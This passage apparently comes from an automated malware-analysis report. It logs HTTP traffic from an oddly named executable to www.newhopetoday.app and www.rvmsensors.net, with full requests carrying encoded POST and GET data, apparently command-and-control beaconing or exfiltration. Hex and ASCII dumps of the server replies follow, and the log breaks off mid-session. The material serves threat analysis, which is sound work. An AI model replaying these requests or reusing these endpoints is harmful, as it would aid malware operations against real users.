                                                                                                                                                                          Data Raw: 39 58 3d 6d 41 70 4e 67 35 63 62 6d 70 53 52 34 38 73 6e 69 6c 36 62 6c 65 5a 5a 35 5a 34 34 66 79 55 4f 4c 78 44 46 7a 7a 65 56 66 77 77 4e 73 75 65 4d 77 4d 69 44 56 31 5a 71 37 75 5a 79 39 2f 6b 74 55 48 6b 64 62 70 4e 34 6b 68 77 33 30 65 42 4f 45 78 65 75 54 2f 4b 34 59 73 51 51 2f 6a 51 53 77 6e 65 54 43 35 6e 30 71 37 6d 52 42 6d 4a 63 51 63 31 33 31 6f 6a 35 75 68 65 53 62 34 79 32 45 36 34 64 47 6c 6a 72 71 4d 65 62 54 6c 6e 30 32 4a 48 48 34 2f 56 75 62 35 4d 65 47 2f 4b 35 47 74 71 53 41 6c 77 4b 37 4c 67 4b 52 6f 4b 54 6f 33 65 46 35 68 4e 67 42 38 4a 39 66 68 44 76 67 44 39 46 46 5a 6d 59 6b 46 67 36 4a 67 62 49 59 34 31 38 32 47 4b 43 2b 66 33 68 6f 48 6d 49 64 36 4e 50 6c 77 77 30 51 49 65 68 2b 30 6f 64 79 74 45 74 4c 6e 46 38 71 34 5a 70 56 34 36 69 44 31 56 47 73 41 38 79 42 70 48 6e 32 62 2b 54 65 51 6c 2b 69 57 71 52 57 48 51 6d 56 76 65 46 5a 6f 78 62 65 36 41 2f 63 77 74 37 4a 4b 4e 47 64 30 48 31 7a 78 4f 51 54 4c 6e 30 55 58 70 2b 39 65 61 2f 63 6f 66 43 2f 72 66 68 79 66 6b [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=mApNg5cbmpSR48snil6bleZZ5Z44fyUOLxDFzzeVfwwNsueMwMiDV1Zq7uZy9/ktUHkdbpN4khw30eBOExeuT/K4YsQQ/jQSwneTC5n0q7mRBmJcQc131oj5uheSb4y2E64dGljrqMebTln02JHH4/Vub5MeG/K5GtqSAlwK7LgKRoKTo3eF5hNgB8J9fhDvgD9FFZmYkFg6JgbIY4182GKC+f3hoHmId6NPlww0QIeh+0odytEtLnF8q4ZpV46iD1VGsA8yBpHn2b+TeQl+iWqRWHQmVveFZoxbe6A/cwt7JKNGd0H1zxOQTLn0UXp+9ea/cofC/rfhyfkuk1RzibdpMRKzmuPGQ/N/QbGdv378vU7MF9NW/17OeM2oZ3rHrOoIRlgwsQQxKhgU30i/lxifFhiRxtZEM1zDAPdA70f1TrPHt7iRopIbhBmIGCbJj1dDaO0ofLAb+E4FHvNRdJPfPWqE0mA8KOTYtEp8ujx5QNSxDNYBn2Tc5+kTFKK7ufUUorYT9tbA2/iGa/R72LCpGgVCIjZCntsY7rUsk4gXQvs1asF2JYgBvCfMDdLChrTjqoULgle/J/V+YPus0DKUNfWL/yIYMi8lastrvXhnpPPA3N9URkwe9KdUGzH16SyHO4qQTZ3yVooB/NiPt4cnlEpynfFLDFR3+xdTikyyLA39yXRHEXd7zYWoTZbWNH7YpQ2xXRKXlVl0Ay4gH341k60gIqdNw3mhAu99kP5BqjKie0tlH3efV1ksHyaCBckRnolQ3bf7r4fenE7bwsUDbzxqieky/QywiDcEumCPw6pjZ2Tf1yeJUAjTvFrs7NfKV3euNTPWtbqX3vxGVWNCLu99KKtHjH9verX8NsGPK8aPN1AimVO+5iyw+WugmRZdvVsHENsJnMA0m3NPNyBpCYHKgWzywpXT1Ypp5VRXp1w3LoXfckp/3pCQA/up1f2uFleHzCXe7UIGGiajYKFzVaLGosupjKKDwQSc9+y0tMUbr [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:45.177743912 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                          x-request-id: 72d2be07-b32e-486a-81fa-42a1a10e4cf0
                                                                                                                                                                          x-runtime: 0.023036
                                                                                                                                                                          content-length: 18133
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:45.177767038 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                                                                                                          Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                                                                                                                          Oct 23, 2024 17:15:45.177778959 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                                                                                                                          Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                                                                                                                          Oct 23, 2024 17:15:45.177789927 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                                                                                                                                          Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                                                                                                                                          Oct 23, 2024 17:15:45.177802086 CEST848INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                                                                                                                                          Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                                                                                                                                          Oct 23, 2024 17:15:45.177814007 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60
                                                                                                                                                                          Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
                                                                                                                                                                          Oct 23, 2024 17:15:45.177825928 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33
                                                                                                                                                                          Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
                                                                                                                                                                          Oct 23, 2024 17:15:45.177839041 CEST424INData Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72
                                                                                                                                                                          Data Ascii: d_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
                                                                                                                                                                          Oct 23, 2024 17:15:45.177853107 CEST1236INData Raw: 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35
                                                                                                                                                                          Data Ascii: call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110
                                                                                                                                                                          Oct 23, 2024 17:15:45.178498983 CEST1236INData Raw: 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 74 72 61 63 65 46 72 61 6d 65 73 5b 69 5d 2e 61 64 64
                                                                                                                                                                          Data Ascii: frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selec
                                                                                                                                                                          Oct 23, 2024 17:15:45.184323072 CEST1236INData Raw: 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68 3c 2f 61 3e 20 2f 0a 20 20 20 20 20 20 20 20 3c 61 20 64 61 74 61 2d 72 6f 75 74 65 2d 68 65 6c 70 65 72 3d
                                                                                                                                                                          Data Ascii: th (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" place


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          48192.168.2.550025216.40.34.41802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:47.096137047 CEST524OUTGET /a3g8/?1BSHu=OBVxGh8PUTflSv4p&9X=rCBtjJUCi7SB2rgsrATHoblCkaEhTmMbACbG+CnZd2Ypm/CW+vOsJnZFvrxs6YcQD3M8aJdgrkwo15E7VwGofvb1NfQ6zSVSxSWpILyRw7uSQHVmZsRD5PzpuDuRbdvTXA== HTTP/1.1
                                                                                                                                                                          Host: www.newhopetoday.app
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:15:47.766477108 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                          x-download-options: noopen
                                                                                                                                                                          x-permitted-cross-domain-policies: none
                                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                          etag: W/"489b1cc03742192cd82a546616d2ba37"
                                                                                                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                          x-request-id: 2005e0d1-1667-4d3f-9123-264834feb0ef
                                                                                                                                                                          x-runtime: 0.006377
                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 31 37 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 1759<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
                                                                                                                                                                          Oct 23, 2024 17:15:47.766504049 CEST212INData Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62
                                                                                                                                                                          Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>newhopetoday.app</h1><h2>is a totally awesome ide
                                                                                                                                                                          Oct 23, 2024 17:15:47.766515017 CEST1236INData Raw: 61 20 73 74 69 6c 6c 20 62 65 69 6e 67 20 77 6f 72 6b 65 64 20 6f 6e 2e 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 27 62 69 67 27 3e 43 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 27
                                                                                                                                                                          Data Ascii: a still being worked on.</h2><p class='big'>Check back later.</p><form action='https://www.hover.com/domains/results' method='get'><input name='source' type='hidden' value='parked'><input name='q' placeholder='Find a domain for your own g
                                                                                                                                                                          Oct 23, 2024 17:15:47.766587019 CEST1236INData Raw: 72 2e 63 6f 6d 2f 74 6f 6f 6c 73 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 59 6f 75 72 20 41 63 63 6f 75 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6e 61 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 27 73 6f 63 69 61 6c 27 3e
                                                                                                                                                                          Data Ascii: r.com/tools?source=parked">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" />
                                                                                                                                                                          Oct 23, 2024 17:15:47.766601086 CEST1236INData Raw: 39 37 37 34 37 20 31 35 2e 36 35 33 33 32 2c 32 39 2e 32 38 37 31 36 20 2d 35 2e 37 36 37 37 33 2c 2d 30 2e 31 38 32 36 35 20 2d 31 31 2e 31 39 33 33 31 2c 2d 31 2e 37 36 35 36 35 20 2d 31 35 2e 39 33 37 31 36 2c 2d 34 2e 34 30 30 38 33 20 2d 30
                                                                                                                                                                          Data Ascii: 97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-
                                                                                                                                                                          Oct 23, 2024 17:15:47.766614914 CEST1236INData Raw: 30 33 74 2d 33 20 2d 39 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 30 2e 35 20 2d 37 36 2e 35 74 2d 30 2e 35 20 2d 37 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 33 20 2d 39 36 2e 35 74 31 30 20 2d 31 30 33 74 31 38 2e 35 20 2d 37 31 2e 35 71 32 30 20 2d
                                                                                                                                                                          Data Ascii: 03t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t105.5 0t96.5 3t103 10t71.5 18.5q50 20 88 58t58 88q11 29 18.5 71.5t10 103t3 96.5t0
                                                                                                                                                                          Oct 23, 2024 17:15:47.766624928 CEST87INData Raw: 2c 20 27 55 41 2d 34 31 37 31 33 33 38 2d 34 33 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                          Data Ascii: , 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          49192.168.2.55002637.9.175.196802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:52.953013897 CEST775OUTPOST /hcwd/ HTTP/1.1
                                                                                                                                                                          Host: www.rvmsensors.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.rvmsensors.net
                                                                                                                                                                          Referer: http://www.rvmsensors.net/hcwd/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 39 6f 45 39 4e 39 68 7a 76 55 47 4f 55 34 42 39 35 35 56 47 46 62 2b 30 51 53 4b 62 75 6a 70 4e 36 59 4e 44 34 7a 72 43 6f 47 77 52 47 54 61 59 4f 46 54 70 44 4b 58 57 35 38 59 72 30 4e 47 2f 47 46 4c 61 48 36 33 39 49 65 2f 78 72 73 2b 63 43 77 4e 4e 2b 72 51 70 78 63 62 45 56 32 67 54 58 6e 31 32 68 50 63 30 7a 2f 61 52 6e 59 58 6b 4d 46 76 58 6f 47 74 67 43 50 76 68 38 50 54 74 32 38 39 6f 78 72 53 78 6c 58 47 6b 62 4d 62 4d 4d 4f 33 68 45 64 36 2b 6c 56 74 67 43 4c 71 36 71 4d 6c 4d 6d 6f 46 39 44 70 70 71 58 5a 6b 2f 72 72 7a 39 4b 56 36 6b 68 48 4d 30 66 67 47 61 46 56 7a 49 55 79 30 3d
                                                                                                                                                                          Data Ascii: 9X=9oE9N9hzvUGOU4B955VGFb+0QSKbujpN6YND4zrCoGwRGTaYOFTpDKXW58Yr0NG/GFLaH639Ie/xrs+cCwNN+rQpxcbEV2gTXn12hPc0z/aRnYXkMFvXoGtgCPvh8PTt289oxrSxlXGkbMbMMO3hEd6+lVtgCLq6qMlMmoF9DppqXZk/rrz9KV6khHM0fgGaFVzIUy0=
                                                                                                                                                                          Oct 23, 2024 17:15:53.968419075 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:53 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: br
                                                                                                                                                                          Data Raw: 64 61 39 0d 0a 15 9f 4e 00 c4 ff d7 e9 57 ff 9b ea 2e 13 6c ef 01 59 24 e3 8f 07 6f 88 51 c0 c3 e8 1b 24 06 09 9c 66 8a 72 9a 62 53 ea a6 da 90 3c ff 6a bf 7a 7f 58 a8 b0 f1 29 cf 6c 2c 09 93 6a 98 a9 da 77 f7 ef 03 b3 0a f4 74 f7 bc a5 b7 7b 40 1b 22 2c 9f 8a 8e d2 40 32 36 2e ca be f0 e5 31 54 97 b6 7b 3f f1 00 22 20 46 93 cd 63 04 2c 59 5f 50 0d 88 f4 f0 cc 21 35 c0 61 2b 00 c4 0d 07 47 fb fa fd f9 ab 42 0a 94 ba 3d ff a4 5c d4 da 58 a9 36 10 80 e3 4e 07 a4 29 3e a0 3c ab 01 66 b6 07 1c a3 e4 70 4c c8 30 34 c5 3b 64 ce 60 2b 6f e9 6c a6 f2 0b 8c d7 e2 a0 46 87 b4 68 cb d0 58 e4 a2 1e ac 69 87 96 59 f6 65 3e e3 2e 37 89 d5 f7 e1 60 9e 07 0e f8 39 42 58 af 24 5b d1 64 5e 9b 2d 35 44 c0 fb ca 94 86 ce 22 9e 15 d2 41 e2 f4 f9 07 ad ad ed 3c ba 3b c8 31 73 ca 89 a2 bd dc 4b cf 65 cf 95 1b 42 04 4a bf 33 ba 79 40 aa 3d ad 28 15 db 51 7d 1d 0d f3 cc 3e a5 91 6a 8b 9e 9a cc e1 b8 61 27 6e 63 ce 9d bb a4 da 78 1d 57 2b 27 08 f0 98 9d da 38 2c 62 60 18 38 38 42 fa a9 af 89 be 90 78 a6 16 86 dc 02 de 64 88 [TRUNCATED]
                                                                                                                                                                          Data Ascii: da9NW.lY$oQ$frbS<jzX)l,jwt{@",@26.1T{?" Fc,Y_P!5a+GB=\X6N)><fpL04;d`+olFhXiYe>.7`9BX$[d^-5D"A<;1sKeBJ3y@=(Q}>ja'ncxW+'8,b`88BxdD+)!_Se)prl)&t;B[LV1vHQ/L(lNnmb<qCR%js*K*:D~&37tUyygrVMlI*-r9Rf{?Mb"eiuySIe2gwS#A?$ai/*dBE.l\:pQ.EI3C&S3a.._CX<c`#\Zd`1Mdh>?\mjNG>yaV[y650Lrur|;^ih|(D[>IH~<#D(GDy52ko$(]Ms@E:zV,6JYR`EO1gSmPEI&XezPVIiWSQYd~zn9/KSJk<A+\'_e"|IyLP,Z5CPjKO#1g5=Ww]DN.6[vCbUU\;:g\OE) [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:53.968452930 CEST1236INData Raw: e0 01 0f 8c 69 c7 9e 35 c5 8d aa c2 27 d0 e1 7e 3d d5 4b bc c1 da 03 c7 d6 02 6f bf 90 f7 48 05 15 c0 6c 61 07 8e 93 f0 da c2 1a cd 88 21 29 6b 07 58 6c 36 46 bd ea 0b 04 cc e0 fc a8 a8 1f 06 5a a9 0a e7 61 9c 8f f5 4b 34 7b 07 ab 86 28 0a 0a 7d
                                                                                                                                                                          Data Ascii: i5'~=KoHla!)kXl6FZaK4{(}8E T5#n\:kTJ[cfFN9&+9O6%ZQKH4vGkF6g5 TBM/WylmqnQh Y'|M$'pW$LV*f
                                                                                                                                                                          Oct 23, 2024 17:15:53.968465090 CEST1236INData Raw: 48 91 06 3d 9e 00 e0 46 57 5f 83 e4 bd cc 3a 07 22 75 7f 39 82 cb 1b fd 7f 83 3b 07 d0 ea 26 e5 32 17 02 23 2b 1b 0b 5b 72 2b 6e da fc 6a c8 1e 1e 4d e6 87 9f f9 9e 77 0f 56 84 79 40 bd 5b b0 6f 47 e8 72 ec ea 77 31 89 7d 8d 75 c7 55 dc d5 6a 39
                                                                                                                                                                          Data Ascii: H=FW_:"u9;&2#+[r+njMwVy@[oGrw1}uUj9[.,3(4?[68nPHYBI{WN{s$WV6 ^(\Ve6s,Cs#ThTtf~]0HR UQ$
                                                                                                                                                                          Oct 23, 2024 17:15:53.968475103 CEST8INData Raw: 17 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0
                                                                                                                                                                          Oct 23, 2024 17:15:53.968503952 CEST8INData Raw: 17 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          50192.168.2.55002737.9.175.196802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:55.497889996 CEST795OUTPOST /hcwd/ HTTP/1.1
                                                                                                                                                                          Host: www.rvmsensors.net
